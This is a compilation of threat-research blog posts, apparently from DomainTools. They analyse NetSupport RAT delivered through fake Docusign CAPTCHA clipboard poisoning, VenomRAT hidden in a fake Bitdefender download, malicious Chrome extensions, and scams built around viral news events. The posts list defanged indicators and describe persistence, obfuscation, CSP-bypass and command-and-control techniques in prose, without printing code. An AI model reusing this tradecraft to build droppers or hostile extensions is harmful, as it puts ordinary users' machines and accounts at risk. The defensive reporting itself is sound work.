Our team identified malicious multi-stage downloader Powershell scripts hosted on multiple themed websites including Gitcodes and fake Docusign captcha verifications. These sites attempt to deceive users into copying and running an initial powershell script on their Windows Run command. Upon doing so, the powershell script downloads another downloader script and executes on the system, which in turn retrieves additional payloads and executes them eventually installing NetSupport RAT on the infected machines.

Malicious Powershell Scripts Hosted on Gitcodes

Malicious Powershell scripts were found to be hosted on instances of Gitcodes sites for the purpose of downloading second stage Powershell scripts. The second stage also functioned as downloaders, making 3 or more web requests to retrieve and execute a third stage of scripts from other domains, which then retrieve and run a fourth stage resulting in NetSupport RAT running on the victim host. 

Domain: gitcodes[.]org resolving website with a Gitcodes service running titled: “Gitcodes - #1 paste tool since 2002!” Gitcodes is populated with a malicious Powershell script that concatenates multiple strings to form a domain. It then initiates a web request using the specified user agent and domain to download and run the returned script.

The retrieved script from tradingviewtool[.]com subsequently invokes additional web requests to download 3 files from a different domain “tradingviewtoolz[.]com” and also initiates multiple requests to tradingviewtool[.]com. Initially the script reaches out to https[:]//tradingviewtool[.]com/info2.php, which appears to be a method of checking in with the computer name to record the initial execution of the script. Once the script completes its intended purpose and cleans up its local artifacts, it calls out to the same domain again at https[:]//tradingviewtool[.]com/info3.php with the computer name likely indicating the host is infected.

As seen in the capture above, this second stage script performs a series of malicious actions to install a payload and make it persistent, all while trying to hide its activities and deceive the user. The script essentially functions as a downloader, retrieving NetSupport RAT and running it on the system. The three files contain a legitimate 7zip executable, which it uses to unpack “client32.exe” and creates a new entry in the Windows Registry's "Run" key for the current user for it. This ensures that `client32.exe` will automatically start every time the user logs in, establishing persistence for the malware. Naming it "My Support" is an attempt to make it look less suspicious in lists of startup programs.

Uncovering the Broader Malware Ecosystem Behind the Campaign

The observed infrastructure had a wider variety though the combination of registration and website configurations as well as the repeat use of malicious payloads enabled the identification of additional lure sites serving similar malicious downloader scripts.

Registrar:

• Cloudflare
• NameCheap
• NameSilo

NameServer: 

• cloudflare[.]com
• luxhost[.]org
• namecheaphosting[.]com

SSL Issuer: WE1

Website Title contains Gitcodes

Example 1:

Example 2:

Fake Docusign CAPTCHAs Used to Deploy NetSupport RAT

Pivoting on the Netsupport RATs being distributed and the associated infrastructure, additional malware distribution domains were identified including Docusign spoofed websites. Similar to the Gitcodes sites, multiple stages of script downloaders were observed resulting in Netsupport RATs being installed on victim machines.

An initial payload retrieves a “s.php” file from a domain spoofing as docusign. It then unzips the file and launches a script within it.

docusign.sa[.]com

‍

The main malicious functionality is present in “docusign.sa[.]com/verification/s.php,” which is initially ROT13 encoded, likely to avoid signature detections and obfuscation. ROT13 or rotate 13, is a form of Caesar Cipher in which a simple letter substitution replaces each letter with the 13th letter after it in the alphabet. Completing this operation twice effectively decodes the text.

The page is designed to look like a Cloudflare "Checking your browser" / CAPTCHA page, mixed with Docusign branding. The initial screen presents a fake CAPTCHA checkbox (.captcha-check). Upon clicking, "s.php?an=0" is triggered, likely for logging the click attempt. The page then initiates Clipboard Poisoning, in which a “unsecuredCopyToClipboard()” function is called, copying an encoded multi-layered string to the user’s clipboard. The user is instructed to (Win+R, Ctrl+V, Enter) or in other words, open their Window’s Run prompt, copy in the malicious script, and run it. 

Also on the s.php page, after the clipboard poisoning, an interval timer is set to make an AJAX GET request to c.php every second. If c.php returns "1," the current page (s.php) reloads (window.location.reload()). This is likely a C2 (Command and Control) mechanism waiting for the victim to paste and run the PowerShell script on their machine. 

The string copied to the user’s clipboard decodes to the following PowerShell script:

This script downloads a persistence script, “wbdims.exe,” from Github. It then starts it as a process, creates a COM object for Windows Script Host, which it then uses to create a shortcut in the Startup folder to automatically execute when the user logs in.

While this payload was no longer available during the time of investigation, the expectation is that it checks in with the delivery site via “docusign.sa[.]com/verification/c.php.” Upon doing so, it triggers a refresh in the browser for the page to display the content of “docusign.sa[.]com/verification/s.php?an=1.”

The initial clipboard poisoning delivered a first-stage PowerShell downloader. The refresh of s.php (to s.php?an=1) delivers this second-stage PowerShell script, which then downloads and executes a third-stage payload (jp2launcher.exe from the zip file) retrieved by passing “an=2” argument to the same php page “docusign.sa[.]com/verification/s.php?an=2.”

Downloaded Zip File: 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd

The script then unzips the file and starts a process called “jp2launcher.exe”, which subsequently, goes through additional stages of file retrievals and executions resulting in a NetSupport RAT (3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7) being installed on the victim machine with these associated network actions:

http[:]//mhousecreative[.]com

http[:]//170.130.55[.]203:443/fakeurl.htm

In summary, the fake Docusign website is likely distributed via phishing attempts over email and/or social media. It is the beginning of an elaborate multi-stage NetSupport RAT delivery method that relies upon deceiving users into verifying they are humans by copying and running a malicious powershell script on their machines. The multiple stages of scripts downloading and running scripts that download and run yet more scripts is likely an attempt to evade detection and be more resilient to security investigations and takedowns. 

By breaking the attack into small, distinct steps, the attacker increases the chance that at least one stage will slip past initial signature-based defenses. Additionally, the early phase persistence files appear to be short lived or quickly identified and taken down, however the subsequent later stages appear to be active for longer time frames. This demonstrates the method's somewhat effective disposable pawn strategy with a more resilient late game setup. 

The Widening Scope of Clipboard Poisoning Attacks

While the use of ROT13 encoding can make some detections more difficult, particularly when depending on services that attempt to preprocess server scan data, the samples themselves allow for more unique identification such as the consistent use of the same strings and comment values within the php code. 

Pivots on the Clickboard Poisoning scripts identified several other nearly identical instances of the code present on a wider range of spoofed content including Okta and popular media apps. Additionally, Discord and GitHub were also identified as being utilized for hosting the next stage malware such as in the following example.

‍

While attribution of this campaign of activity is unclear, pivots on the associated infrastructure and malware identified reuse of associated NetSupport RAT hashes, similar delivery URL patterns, and similar domain naming and registration patterns observed in a previously reported cluster of SocGholish activity. Notably, the techniques involved are commonplace and NetSupport Manager is a legitimate administration tool known to be leveraged as a RAT by multiple threat groups such as FIN7, Scalert Goldfinch, STORM-0408 and others. 

Key Takeaways and Security Recommendations

This analysis highlights a sophisticated and persistent malicious campaign designed to deliver the NetSupport RAT through deceptive means, primarily leveraging spoofed Gitcodes and fake Docusign verification pages. The attackers employ a multi-stage approach, using seemingly innocuous "verify you are human" CAPTCHAs and malicious PowerShell scripts disguised as legitimate prompts to trick users into infecting their own machines. This method capitalizes on user trust and familiarity with common online interactions, such as document verification and code sharing platforms.

Key Security Recommendations:

• Exercise extreme caution when prompted to copy and paste scripts into the Windows Run prompt: legitimate websites rarely, if ever, require users to execute PowerShell commands directly. Always verify the source and legitimacy of any such requests.
• Be wary of CAPTCHA-like verifications that instruct you to run commands: genuine CAPTCHAs do not involve running scripts. Any prompt to do so should be treated as highly suspicious.
• Verify the authenticity of websites: Double-check the URL and SSL certificates of websites, especially those that request sensitive actions or information. Be cautious of lookalike domains.

This campaign serves as a stark reminder of the evolving threat landscape. Attackers are continuously refining their techniques to exploit user behavior and bypass traditional security measures. Vigilance, user education, and proactive security practices are paramount in defending against these increasingly sophisticated threats. The "self-infect" tactic, while seemingly simple, can be highly effective, emphasizing the need for users to remain skeptical and verify all interactions before acting.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/prove-you-are-human.csv

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

A malicious campaign using a fake website to spread VenomRAT, a Remote Access Trojan (RAT), is detailed in this analysis. The malware includes tools for password theft and stealthy access. This research examines the attackers' methods, such as deceptive websites and command infrastructure, indicating a clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems.

VenomRAT, StormKitty, and SilentTrinity Deployment

Malicious domain “bitdefender-download[.]com” resolves a website titled “DOWNLOAD FOR WINDOWS,” which spoofs Bitdefender’s Antivirus for Windows download page.

The “Download For Windows” button initiates a file download from the following bitbucket URL: 

“https[:]//bitbucket[.]org/sadsafsadfsadf/dsfgdsgssdfgdsg/downloads/BitDefender.zip,” 

The bitbucket URL redirects to its content source on Amazon S3.

“https[:]//bbuseruploads.s3.amazonaws[.]com/9e2daa63-bae3-4cbb-9f88-8154ba43261f/downloads/aa7b9593-2ccd-4cd0-9e04-9b4a7da9276b/BitDefender.zip.”

‍

‍

The bundled executable StoreInstaller.exe was found to contain malware configurations associated with VenomRAT. It also contained code associated with open source post-exploitation framework SilentTrinity and StormKitty stealer.

A report by Arconis describes VenomRAT as a RAT that originated as a fork of the open-source Quasar RAT. It is often used for initial access and persistence. Capabilities include remote access, stealing credentials, keylogging, exfiltration and more. 

At a high level, the three malware families function as follows:

• VenomRAT provides initial and ongoing access to victim machines
• StormKitty quickly gathers credentials on the system
• SilentTrinity is used for exfiltration and stealthy long term access

The inclusion of SilentTrinity and StormKitty (both open-source malware tools) indicates the attacker’s dual focus: rapidly harvesting financial credentials and crypto wallets during initial access, while also establishing stealthy, persistent access for potential long-term exploitation. The implications of long term access may include repeat compromise or selling access.

VenomRAT

Observed VenomRAT configurations showed multiple identifiable attributes that allowed for reliable pivots to other samples likely created by the same actor including the reuse of the same IP and port, 67.217.228[.]160:4449, for command and control.

Related samples using the same VenomRAT configurations:

‍

VenomRAT C2 IPs

‍

A reused 3389 service configuration was identified via Shodan “hash:-971903248” allowing for pivots to additional IP addresses with the same configurations. Multiple of the IPs were confirmed to be used as C2s for VenomRAT and are suspected to have also been configured by the same actor.

‍

Delivery Sites:

‍

Credential Harvesting Sites

The lure website domain spoofing as Bitdefender was observed with infrastructure and time proximity overlaps to other malicious domains impersonating banks and generic IT services, suspected of being used for phishing activity. 

NameServer: cloudflare.com

IP ISP: cloudflare.com

Registrar:

• PDR Ltd
• GMO Internet
• NameSilo

SSL Issuer:

• Cloudflare TLS
• WE1

Server Type: cloudflare

‍

idram-secure[.]live Spoofs as Armenian IDBank page
idram-secure[.]live Clicking directs to a site titled “ArmCoin” and the content alleges to be IDBank. The text is in Armenian and translates to: “To connect you to Idram Secure, please write to us in the chat. 🎉 Our chat is located in the bottom right corner of the page”
royalbanksecure[.]online Spoofs as Royal Bank of Canada online banking login portal
dataops-tracxn[.]com Spoofs as Microsoft login page

‍

Protection from Open-Source Malware

This investigation reveals a deceptive campaign using VenomRAT, a powerful remote access tool, disguised as a legitimate Bitdefender antivirus download. Imagine clicking a button on what looks like a trusted site, only to unleash a trio of malicious programs – VenomRAT, StormKitty, and SilentTrinity – onto your system. These tools work in concert: VenomRAT sneaks in, StormKitty grabs your passwords and digital wallet info, and SilentTrinity ensures the attacker can stay hidden and maintain control. We tracked down the attackers' command centers, identified other malware they likely used, and uncovered their web of fake download sites and phishing traps spoofing as banks and online services.

This campaign underscores a constant trend: attackers are using sophisticated, modular malware built from open-source components. This "build-your-own-malware" approach makes these attacks more efficient, stealthy, and adaptable. While the open-source nature of these tools can help security experts spot them faster, the primary victims here are everyday internet users. These criminals are after your hard-earned money, targeting your bank accounts and cryptocurrency wallets with fake login pages and malware disguised as safe software.

This isn't just a problem for big companies – it's a threat to everyone online. So, what can you do?

• Be extremely cautious when downloading software. Double-check website addresses to make sure they're legitimate, especially for banking or login pages.
• Never enter your credentials on a site you're not 100% sure about.
• Practice safe internet habits: avoid clicking on suspicious links or opening unexpected email attachments.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/VenomRAT-Malware-Campaign.csv

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

An unknown actor has been continuously creating malicious Chrome Browser extensions since approximately February, 2024. The actor creates websites that masquerade as legitimate services, productivity tools, ad and media creation or analysis assistants, VPN services, Crypto, banking and more to direct users to install corresponding malicious extensions on Google’s Chrome Web Store (CWS). The extensions typically have a dual functionality, in which they generally appear to function as intended, but also connect to malicious servers to send user data, receive commands, and execute arbitrary code.

Example: A DeepSeek Chrome Extension themed lure website ‘deepseek-ai[.]link’

The extensions analyzed appear to have working or partially working functionality and are commonly configured with excessive permissions to interact with every site the browser visits and retrieve and execute arbitrary code from a network of other actor controlled domains.

While each extension was found to be relatively different, the hosting infrastructure and code structures were consistent. Multiple extensions were observed using a “onreset” event handler trick on a temporary document object model (DOM) element to execute code, likely to bypass content security policy (CSP). The extensions hardcode one of the actor’s API servers, typically in a file named “background.js” or “background.iife.js” or for older extensions “src/pages/background/index.js.” These files were also found to typically contain the majority of the malicious functionality of the extensions.

Registration Patterns for Actor Lure Websites

Common registration patterns were observed going back to October 2024.

• Registrar: NameSilo, LLC
• NameServer: cloudflare.com
• IP ISP: CloudFlare Inc.
• SSL Issuer Common Name: WE1
• Registrant: Domain Administrator
• Server Type:
  • cloudflare
  • proxygen-bolt
• MX Server: cloudflare.net

Additionally, the use of Facebook Tracker IDs were commonly used.

• Facebook ID
  • 2696720993868113
  • 416208351532463
  • 312497404888286
  • 993764766100733
  • 2901646833326404
  • 541163625350468
  • 965666115394891
  • 1151077320148683
  • 965666115394891

The following are a sampling of the lure websites, which cover a wide range of topics and themes. The list of identified domains are provided on GitHub.

‍

Malicious Extensions

It’s worth noting, the extensions appear to be at least partly functional as it relates to the theme of their lure. However, in the cases where extensions interact with third party services to provide that functionality such as FortiVPN or DeepSeek AI, the extensions hard code the third party API keys into the extension code. An extremely poor security practice.

Example 1: Lure Site of Manus AI to Install an AI Assistant Extension

Lure Domain: manusai[.]sbs Extension Name: manus-ai-free-ai-assistan Extension ID: aeibljandkelbcaaemkdnbaacppjdmom CWS:  https[:]//chromewebstore.google[.]com/detail/manus-ai-free-ai-assistan/aeibljandkelbcaaemkdnbaacppjdmom Extension Filename: aeibljandkelbcaaemkdnbaacppjdmom.crx Extension File Sha256: 3131d15ebea5eb68e636eb804b2de86cc04d8be5d1257c83f2042a391b8e9415 Actor API Domain: api.sprocketwhirl[.]top

‍

The first things to note about the extension are the extensive permissions it attempts to grant itself in the manifest.json file.

The “background.js” script fetches and applies declarativeNetRequest rules from the backend. This allows the author to modify network requests (block, redirect, modify headers) after the extension is installed, bypassing Chrome Web Store review for those changes. This could be used for malicious redirects, ad injection, or tracking.

The background script communicates with api.sprocketwhirl[.]top, sending encrypted system information (platform, language, memory, cores, timezone, IP, country code) and receiving dynamic declarativeNetRequest rules and potentially executable code.

The content script (injected into all pages) executes arbitrary code retrieved from chrome.storage.local (report key), which was placed there by the background script after fetching it from api.sprocketwhirl[.]top.

Example 2: Lure Site of FortiVPN Client Extension

Lure Domain: forti-vpn[.]com Extension Name: fortivpn Extension ID: ccollcihnnpcbjcgcjfmabegkpbehnip CWS: https[:]//chromewebstore.google[.]com/detail/fortivpn/ccollcihnnpcbjcgcjfmabegkpbehnip Extension Filename: ccollcihnnpcbjcgcjfmabegkpbehnip.crx Extension File Sha256: f4fe36cdc9bd1f16d9385e56155aca3723a267bcdf575e925e20bb9a6526b576 Actor API Domain: api.infograph[.]top

‍

The extension also attempts to grant itself extensive permissions as seen from its manifest.json file.

The extension has a dual functionality in which it provides some of the advertised purpose. In this case, a browser extension based VPN service by connecting to wss[:]//leviathan.whale-alert[.]io/ws using a hardcoded API key. At the same time, however, the extension also connects to a malicious backend client wss[:]//api.infograph[.]top/api and listens for commands. It uses a websocket keep-alive mechanism to maintain connectivity to the backend server as well as sending periodic ping and report messages.

When commanded, it uses chrome.cookies.getAll({}) to retrieve all browser cookies, compresses them using pako, encodes them in Base64, and sends them back to the backend infograph[.]top server.

It can be commanded to establish a separate WebSocket connection to act as a network proxy, potentially routing the user’s traffic through malicious servers. The proxy target is provided by the backend command and also implements proxy authentication handling.

The extension fetches arbitrary scripts from an actor-controlled server. It then injects the scripts into active browser tabs by using chrome.tabs.sendMessage to the tab’s content scripts, triggering their execution within the tabs.

Additionally, the extension enables dynamic network rules via setup response from the backend that can contain declarativeNetRequest rules which are then applied, allowing the backend to modify network traffic post-install.

Example 3: Lure of SiteStats Extension

Lure Domain: sitestats[.]world Extension Name: site-stats Extension ID: fcfmhlijjmckglejcgdclfneafoehafm CWS: https[:]//chromewebstore.google[.]com/detail/site-stats/fcfmhlijjmckglejcgdclfneafoehafm?pli=1 Extension Filename: fcfmhlijjmckglejcgdclfneafoehafm.crx Extension File Sha256: d6e179dcab901e81b3340aebaa3e517bb98b09f9fea01e667e594416c10efc44 Actor API Domain: api.zorpleflux[.]top

‍

Like the previous examples, this extension also grants itself extensive permissions and script execution on every site as seen from its manifest.json file.

The extension allows modifying network requests via rules. It is also able to make web requests, which is primarily observational in MV3, but combined with broad host permissions, it can still be used for tracking or reconnaissance.

Similar to the other extensions identified, it connects to an actor controlled backend server, api.zorpleflux[.]top, defined in the “background.iife.js” file. It also sends periodic ping and report messages to the backend server.

It is capable of setting up a secondary proxy WebSocket connection, allowing traffic routing via the user’s browser, commanded by the backend. It implements a reverse proxy functionality by handling proxied requests via fetch, compressing responses with pako, and relaying back to the backend.

The extension also conducts arbitrary script execution it receives from the backend server and uses chrome.tabs.sendMessage to send it to the content script declared in the manifest.json file for execution.

Actor API Endpoints

The extensions hardcode one of the actor’s API servers, typically in a file named “background.js” or “background.iife.js.” In the case of the malicious extension from deepseek-ai[.]link, which directs users to an installation of Chrome extension ID: “pocfdebmmcmfanifcfeeiafokecfkikj.” This extension upon installation actively communicates with another actor domain api.glimmerbloop[.]top to report installation/fingerprinting data and receive instructions/payloads.

Many of the analyzed extensions had variations in functionality and implementation of the API payload execution steps including what browser fingerprinting information was sent in the initial transaction. The following were consistent elements observed:

• Hardcoding actor API domain in “background.js” or “background.iife.js” file
• Use of HMAC with SHA-256 signing algorithm
• Use of JWT authentication
• Use of extension ID in UTF-8 bytes format as a secret key to sign the JWT payload
• Base64 encoding the payload prior to sending to the API server

In order to establish connection to the actor’s API server, the extensions create a token using the standard JWT library that combines a UUID, the extension ID, version, and country code. It then uses HMAC using SHA-256 signing algorithm before adding JWT claims to the payload (Issued At, Expiration Time). Finally, a secret key is used to sign the payload, which was consistently observed as being the UTF-8 bytes of the extension ID string. The output is then Base64 encoded using btoa() and sent to the API server as an authentication mechanism to retrieve arbitrary code to execute by the extension.

The domain registration details of the API endpoints were found to be nearly identical to those of the malicious lure websites with the additional commonalities in website title and content.

• Website Title: SiteName
• Website Content:

A pivot on these domain registration patterns identified the domains provided at the end of this post, suspected to be owned by the actor and used by malicious extensions. Analysis of several extensions identified hard coded domains that were all found to be in the list of identified API domains, further validating the findings.

Fake Websites and Malicious Chrome Extensions

Since at least February 2024, this malicious actor has deployed over 100 fake websites and malicious Chrome extensions with dual functionalities. Analysis revealed these extensions can execute arbitrary code from attacker-controlled servers on all visited websites, enabling credential theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Some extensions were also observed attempting to steal all browser cookies, which may lead to account compromises.

Notably, the Chrome Web Store has removed multiple of the actor’s malicious extensions after malware identification. However, the actor’s persistence and the time lag in detection and removal pose a threat to users seeking productivity tools and browser enhancements. Malware distributors such as this often exploit current trends, such as the recent DeepSeek AI media attention, to lure users into installing infected extensions, potentially gaining control over their browsing activity and sensitive data.

All users should protect themselves by exercising caution when installing extensions. Stick to the Chrome Web Store and verified developers, carefully review requested permissions, read reviews, and be wary of lookalike extensions. Keep your browser and antivirus software updated, and regularly review your installed extensions, removing any you don’t need or find suspicious. Vigilance is key to avoiding these threats.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DualFunction-Malware-Chrome-Extensions

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

‍

In the fast-paced digital landscape, viral media events capture global attention. From natural disasters and geopolitical shifts to groundbreaking tech releases and cultural phenomena, these moments dominate headlines and online conversations. But as the world's eyes turn towards these events, a different group also takes notice: malicious actors looking to capitalize on the public's interest and urgency.

Our security research team recently undertook a project to identify and analyze scam and malicious domains and websites that emerge in the wake of high-profile viral media events. Leveraging AI-driven research capabilities, we aimed to understand how threat actors exploit these moments for financial gain and other nefarious purposes.

AI-Powered Approach to Identify Viral Media Events

Our research methodology involved using AI to first identify viral media events that occurred between January 1, 2025, and the present. The AI research capability was prompted to pinpoint the approximate start, peak, and end of each event's virality across mass media and wide coverage.

For each identified event, we then tasked the AI with generating a list of keywords likely to appear in domain names or website titles seeking to associate with the event. The prompt for keyword generation was specifically designed to identify terms that scammers might use to create deceptive sites.

We sampled multiple event topics from the AI's output for deeper analysis, including the Los Angeles Fire, "NoKings," DeepSeek / China AI developments, the ongoing Trade War, and the Ukraine/Russia conflict.

An example of the AI's output for a significant tech event is as follows:

By searching for these keywords or similar terms in domain registrations and website titles within the estimated first and last observed timeframes, we detected several domains that appeared to be malicious. It was anticipated that most scam-related or malicious domains would emerge around the peak of viral activity and potentially persist until the latest observed dates. 

A sampling of the malicious findings from the AI-generated keywords for the “Deepseek AI Release & Market Impact” event are shown below.

Malicious Browser Extensions
Windows Trojan Delivery
Windows Trojan Delivery
Fake DeepSeek Meme Coins BeInCrypto site reported similarly appearing sites to market a fake DeepSeek meme coin.

‍

Multiple scams were identified. Perhaps the most financially successful ones relating to the DeepSeek event were fake cryptocurrency meme coins created to capitalize on a growing trend of novice investors looking for the next hyped up moonshot meme coin. In the case of DeepSeek, according to BeInCrypto (cited in the table above), fake meme coins accrued over 46 million dollars worth before the rug was pulled, presumably indicating the scammers had cashed out.

Additionally, multiple malware delivery websites were observed primarily delivering Windows trojans and malicious browser extensions. One extension in particular was observed with capabilities to legitimately use DeepSeek API for working functionality, but also connected to a remote domain to retrieve and execute arbitrary JavaScript files likely for the purpose of credential harvesting or session hijacking.

Expected vs. Actual Findings Regarding Viral Events

Based on the nature of viral events, we anticipated finding websites and domains attempting to:

• Amplify or create spin-off movements to gain attention.
• Sell merchandise related to the event.
• Collect user information (contact details, experiences, etc.) for spam, resale, or phishing.
• Push deceptive or derisive narratives to further enthral individuals in alleged movements, leading to potential merchandise sales, information gathering, or fraudulent donations.
• Act as "ambulance chasers," with alleged law firms soliciting victims of tragedies for potential profit.
• Delivery of malware, adware, or spyware through deceptive downloads.  

While we did observe instances of these expected tactics, our research consistently revealed a predominant motivation across the sampled events: direct financial profit.

For almost all events sampled, we identified websites explicitly seeking to profit by:

• Allegedly to be part of a legitimate donation foundation supporting the cause (e.g., for the LA Fire, the Ukraine/Russia conflict, and other tragedies like the Myanmar earthquakes).
• Selling merchandise related to the event topic.
• Creating and promoting meme cryptocurrency coins based on the event.

Beyond direct financial scams, we also confirmed the presence of websites designed for:

• Malware delivery.
• Information collection schemes.
• Disinformation campaigns aimed at pushing deceptive and derisive narratives.

Emerging Patterns and Linked Actors Across Viral Events

A significant observation was the emergence of common elements across multiple relatively unique-looking websites covering different viral events. This suggests the likelihood of the same actor or group being behind these diverse scams.

One example was websites that appeared to create meme cryptocurrency coins in response to several highly publicized events in the recent US political landscape and natural disasters, including US tariffs, the trade war, and the LA fire. Several sites appeared to share design, language, or infrastructure elements across these seemingly distinct scam sites points towards a connected operation. 

One suspected cluster focused on scamming meme coins commonly utilized IP ISP: Vercel Inc, Registrar: Namecheap, SSL Issuer CN: R10 or R11, and commonly had website titles with a meme coin name in all caps such as LAFIRE, $LAFIRE, GROK and TOOT. Pivots from this pattern identified several other suspected scam meme coin websites including $TittsFart, $TUCHI, $TOOT, $GWOK, and $SUNG, which is a meme of the top Anime show Solo Leveling’s main character Sung Jinwoo.

The most prevalent scams observed were those pushing newly created cryptocurrency meme coins, which attracted novice traders seeking to ride the hype of the viral event to make easy money. Once the meme coin reaches a certain threshold of time or sale price, the scammers would cash out selling all of their coins and the meme coin would subsequently collapse. These meme coin scams were observed in a wide range of events including international conflicts such as the Russian attacks on Ukraine, the US Trade War, the LA Fire, and the Myanmar Earthquake. 

The following are example findings of similar websites, each associated with inactive social media accounts that claim to sell cryptocurrency coins linked to widely publicized media events.

tradewar[.]space, tradewar[.]lol, tradewar[.]site attempt to persuade others to purchase Trade War themed cryptocurrency coins.

‍

‍

lafirebrigade.co[.]uk and lafireonsol[.]xyz attempt to persuade others to purchase a LA Fire-themed cryptocurrency coin.

lafire[.]io is another website attempting to pawn off scam crypto coin LAFIRE as a donation fund tactic. 

Myanmar Meme coin myanmarmeme[.]top

tootonsol[.]xyz

gork[.]ink suspected scam meme coin attempted to capitalize on the recent news hype of the Elon Musk-owned xAI Grok AI model. Decrypt reported the alleged scam meme coin achieved $160 million in market capitalization before crashing.

The second most prevalent scam tactic observed involved fake donations, sometimes masquerading as established entities such as the American Red Cross, World Food Program or LA Fire departments.

Specifically relating to the LA fire event, BforeAI published a report highlighting a similar method of identifying these types of scam domains in which a variety of websites were identified. Their report also noted multiple consistencies in the types of domains and websites being created in the aftermath of natural disasters.

lafirevictimsupport[.]com and lafireonsol[.]xyz purported to collect donations on behalf of the American Red Cross.

donorsee-charitable[.]com cryptocurrency donation scheme for Myanmar earthquake victims purporting to be part of the World Food Program (WFPUSA). 

Malicious Actors Leveraging Viral Media Events for Financial Gain

Our research highlights the clear and present danger posed by malicious actors who quickly leverage viral media events for their own gain. The speed at which these events unfold provides a fertile ground for scammers to deploy a variety of schemes primarily focused on financial exploitation through fake donations, merchandise sales, and cryptocurrency scams. The observed connections between scam sites operating across different viral topics underscore the adaptive and potentially organized nature of these threat actors.

Staying vigilant and critically evaluating any website or domain seeking engagement related to a viral event is crucial. Always verify the legitimacy of organizations, especially those requesting donations or personal information, and be wary of unsolicited offers or urgent calls to action tied to breaking news. As security researchers, we will continue to monitor this evolving threat landscape and share our findings to help the public stay safe online.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Like any garden, the digital landscape experiences the emergence of unexpected blooms. Among the helpful flora of browser and application extensions, some appear with intentions less than pure. These deceptive ones, often born from a fleeting desire for illicit gain or mischievous disruption, may possess a certain transient beauty in their ingenuity. They arrive, sometimes subtly flawed in their execution, yet are driven by an aspiration to infiltrate our digital lives, to harvest our data, or to simply sow chaos.

We see them not in complete, monolithic forms, but in their evolving iterations. A small crack in their initial design might be patched in the next update, a vulnerability exploited and then hastily concealed. Their existence is a dance of adaptation, a response to the ever-watchful gaze of security systems. They are, in a sense, perfectly imperfect – their flaws often intertwined with the very mechanisms that allow them to function, however briefly.

On the other side of this digital ecosystem reside the forces of security and risk awareness. These are the gardeners, constantly tending to the health of the digital space, pruning away the harmful growths. Security measures, with their own imperfections and constant striving for improvement, represent the human desire for safety and control. Risk, then, is the shadow cast by these deceptive extensions, a reminder of the potential cost of their transient existence – the loss of privacy, the compromise of personal information, the erosion of trust in the digital tools we rely upon.

The human experience at the heart of this is one of vulnerability and resilience. We, the users, navigate this landscape, often unaware of the subtle battles being waged. We place our trust in the extensions we install, hoping for enhanced functionality or convenience. When that trust is betrayed by a deceptive app or extension, it leaves a mark, a subtle crack in our digital confidence. 

This story is a reminder that the digital world, like the natural one, is in constant flux, and our experience within it is shaped by this delicate and ever-shifting balance between aspiration and risk, between the fleeting beauty of innovation and the enduring need for security.

Browser Extensions’ Security Risk

Browser extensions can pose a security risk to individuals and organizations. Data from the user’s browser or inputs to the extensions can be sent to third parties who may not practice effective security measures to protect user data and privacy. This report highlights a network of approximately 20 newly registered websites intended to lure people to install new browser extensions from the Google Store. The domains and extensions were likely created by a single author, which exhibit patterns of deceptive practices and potential security risks. While the extensions do not display overtly malicious behavior, their design choices raise concerns regarding user privacy and data security.

The Network and Its Characteristics:

The extensions, available on the Google Chrome Web Store, share several common traits:

Manipulated Ratings: All extensions employ a deceptive rating system, funneling positive reviews to the Chrome Web Store while discarding negative feedback.

External Data Transmission: Some extensions, particularly those offering AI-powered features, transmit user data to domains owned by the author. This includes chat history, input data, and potentially sensitive information.

Misleading Branding: Certain extensions use misleading branding, falsely associating themselves with well-known services (e.g., "DeepSeek AI").

Functional Diversity: The extensions offer a range of functionalities, including AI writing and ad creation tools, URL shortening, PDF to JPG conversion, and AI chatbots.

Security Researcher's Guide: Investigating Suspicious Browser Extensions:

Investigative Steps:

• Initial Observation:
  • Note the extension's stated functionality and its perceived utility.
  • Examine user reviews for consistency and authenticity. Be wary of overwhelmingly positive reviews with limited negative feedback.
  • Record the developer's name and any associated websites or domains.
• Extension Retrieval:
  • Obtain the Extension ID: Locate the extension on the Chrome Web Store or via a URL from a website directing to download the extension
  • Download the Extension: Use a tool like chrome-stats[.]com to download the extension's .crx file.
  • Unpack the Extension: One method is to use a file archiving tool (e.g., 7-Zip) to extract the contents of the .crx file.
• Analyze the Files:
  • Examine the manifest.json file for permissions requests and service worker details. Pay attention to permissions that seem excessive for the extension's stated functionality.
  • Analyze Javascript files for suspicious code, external API calls, and data transmission patterns. Look for obfuscated or unusual code that may warrant further investigation.
  • Review the Domains: Research the domains that the extension uses, and be suspicious of generic or unknown domains. Assess the domain's registration information, hosting provider, and overall reputation.
• Data Flow Assessment:
  • Identify the types of data being transmitted and the purpose of the transmission. Evaluate the security and privacy implications of the data transmission.

Examples:

An interested user might see the reviews are 4.8 stars and at least 1,000 users. Not an insubstantial number given the recent global proliferation of DeepSeek AI related apps in the past few months.

A closer look at the reviews shows 4 ratings.

‍

‍

The extension's core functionality involves capturing user input and the entire ongoing chat history, then transmitting this data to an external server (ai-chat-bot.pro) with every message sent by the user. This presents a significant privacy risk, as potentially sensitive conversation data is processed by an unverified third party.

Common among all the observed extensions by this author is code that includes a rating widget that actively filters user feedback. Users providing low ratings (1-3 stars) are redirected to a private feedback form on the ai-chat-bot[.]pro domain, while users providing high ratings (4-5 stars) are sent to the official Chrome Web Store (CWS) review page. This artificially inflates the extension's public rating and violates CWS policy.

